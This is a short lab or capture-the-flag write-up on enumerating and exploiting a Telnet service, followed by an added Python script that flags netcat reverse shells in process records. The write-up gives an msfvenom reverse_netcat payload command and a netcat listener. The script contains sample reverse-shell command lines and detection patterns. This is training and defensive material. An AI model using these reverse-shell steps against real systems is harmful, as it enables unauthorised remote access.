Post 27 - Telling of the net
Network Services part 4
Enumerating Telnet
Same process as with SMB: start with a port scan.
Answered the questions
Exploiting Telnet
Since I always forget,
CVE - Common Vulnerabilities and Exposures
Even though CVEs exist for telnet, it is still far more likely that a misconfiguration is what gets exploited.
The Next Task
Try connecting to the system scanned in the previous task.
Need a listener first. tcpdump works: sudo tcpdump ip proto \\icmp -i eth0 starts a tcpdump listener for ICMP traffic. Use eth0 only on the AttackBox; use tun0 for a VPN connection. Then, in the remote (telnet) session, run .RUN ping [ip address] -c 1, where [ip address] is the local machine. If the ping shows up in tcpdump, commands sent through the telnet session are being executed and there is a route all the way back to the local machine.
Create a reverse shell with msfvenom -p cmd/unix/reverse_netcat lhost=[local ip] lport=4444 R where:
- -p = payload (cmd/unix/reverse_netcat)
- lhost = local ip address
- lport = local port to listen on
- R = export payload in raw format
Start a netcat listener with nc -lvp 4444. Once the reverse shell connects back, commands can be run through the listener.
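The defender's side of the steps above, as an added example that is not part of the original write-up: a small Python triage over constructed process-execution records that flags the fifo-chained netcat shape the cmd/unix/reverse_netcat payload produces, netcat given -e/-c, an outbound netcat to a remote host:port, and any of these spawned under telnetd. The record format, parent names, IPs and ports are assumptions made up for the example.

```python
import re

# Constructed sample process-execution records as (parent process, command line).
# Not real logs; made up to exercise the checks below.
SAMPLE_EVENTS = [
    ("telnetd", "sh -c 'mkfifo /tmp/f; nc 10.10.14.2 4444 < /tmp/f'"),
    ("sshd", "ls -la /home/user"),
    ("cron", "nc -z localhost 25"),  # local port probe, should not be flagged
    ("telnetd", "nc -e /bin/sh 10.10.14.2 4444"),
    ("bash", "cat /etc/hostname"),
]

NETCAT = r"\b(?:nc|ncat|netcat)\b"
# mkfifo followed by netcat in the same shell command (reverse_netcat payload shape)
FIFO_PLUS_NC = re.compile(r"\bmkfifo\b.*" + NETCAT)
# netcat given -e or -c, i.e. a program bound to the socket
NC_EXEC = re.compile(NETCAT + r".*\s-[A-Za-z]*[ec]\b")
# netcat with a dotted IPv4 address and a port somewhere after it
NC_REMOTE = re.compile(NETCAT + r".*?(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b")


def classify(parent, cmdline):
    """Return the reasons this record looks like a reverse shell; empty if benign."""
    reasons = []
    if FIFO_PLUS_NC.search(cmdline):
        reasons.append("fifo-chained netcat (reverse_netcat payload shape)")
    if NC_EXEC.search(cmdline):
        reasons.append("netcat with -e/-c (program bound to socket)")
    m = NC_REMOTE.search(cmdline)
    if m and not m.group(1).startswith("127."):
        reasons.append(f"outbound netcat to {m.group(1)}:{m.group(2)}")
    # A telnetd child running netcat is the exact chain the write-up builds.
    if reasons and parent in ("telnetd", "in.telnetd"):
        reasons.append("spawned under telnetd")
    return reasons


def triage(events):
    """Return (parent, cmdline, reasons) for each record with at least one reason."""
    flagged = []
    for parent, cmd in events:
        reasons = classify(parent, cmd)
        if reasons:
            flagged.append((parent, cmd, reasons))
    return flagged


if __name__ == "__main__":
    for parent, cmd, reasons in triage(SAMPLE_EVENTS):
        print(f"[{parent}] {cmd}\n    " + "; ".join(reasons))
```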
Answered all questions and got the flag.